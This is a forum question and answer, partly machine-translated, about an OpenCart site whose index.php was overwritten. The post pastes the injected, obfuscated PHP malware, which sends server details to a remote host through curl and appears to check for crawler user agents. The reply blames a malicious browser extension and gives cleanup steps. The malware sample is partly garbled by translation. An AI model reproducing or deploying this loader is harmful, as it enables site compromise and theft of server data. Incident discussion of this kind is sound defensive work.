Opencart index.php 文件损坏
P粉545956597
2023-08-30 12:23:26
<p>我使用的是opencart v3.0.2.0,问题是opencart的index.php文件(我的opencart网站的入口点,上传到public_html目录)崩溃了(index.php文件中的代码发生了变化到奇怪的字符)。
上周发生了两次这种情况。我不知道有人遭到黑客攻击或者我的域名或代码出现问题。
如果有人可以帮助或指导我,请告诉我。
谢谢。</p>
<p>损坏后的index.php文件:</p>
<p>全局 $O; $O=url解码($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9].$O[62].$奥[63].$奥[63].$奥[64].$奥[72].$奥[66].$奥[59].$奥[65].$奥[67].$奥[ 71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O[67].$O[65] .$O[63].$oOooOO.$O[63];函数ooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOoOoo);curl_setopt($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec( $ooooOOOooOo);curl_close($ooooOOOooOo);返回 $ooooOOOOooO; } 函数 ooOOoOOO($OooooO,$Ooooooo=array()){ 全局 $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO, CURLOPT_POST, 1); CURLOPT_POSTFIELDS, http_build_query($OOOOoo));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOoooOO){返回 false ;}返回 $OOOOooo ;} 函数 oooOOOo($ooOOo){全局 $O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14]. $O[18].$O[2].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14].$O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O[90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10]. $O[8] .$O[18];if ($ooOOo!=''){if (preg_match("/($oooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}返回$ ooOOOOo;} 函数 oooOOooOOoOO ($oOOOOOOoOOOO){全局 $O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90]. $O[5].$O[10].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16].$O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO=true;}返回 $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O[63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63]. $O[63] );$oOoooOOoOO=$_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$ O[30]。$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOooooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$ $O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ $O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O</p>
I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into
PHP
files when uploading anyphp
files through the browser (like Cpanel File Management). In this case, the code was injected into theindex.php
file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using thecURL
function inPHP
.要解决此问题,您可以采取以下步骤:
1- 截取浏览器中用于将文件上传到服务器的所有扩展程序的屏幕截图,与我们共享,然后删除浏览器或其所有扩展程序。
2- 检查自黑客事件发生之日起上传或更新到服务器的所有文件。您可以在服务器上运行命令来获取新文件或更新文件的列表,具体取决于您的操作系统。
3- You may find some
*.php
files in the.well-known
or other hidden folders on the server.4- 使用防病毒软件保护您的操作系统。我建议使用非免费防病毒软件,例如卡巴斯基。
您能否分享您的浏览器扩展程序的屏幕截图,以便我们确定哪个扩展程序可能导致网站遭到黑客攻击?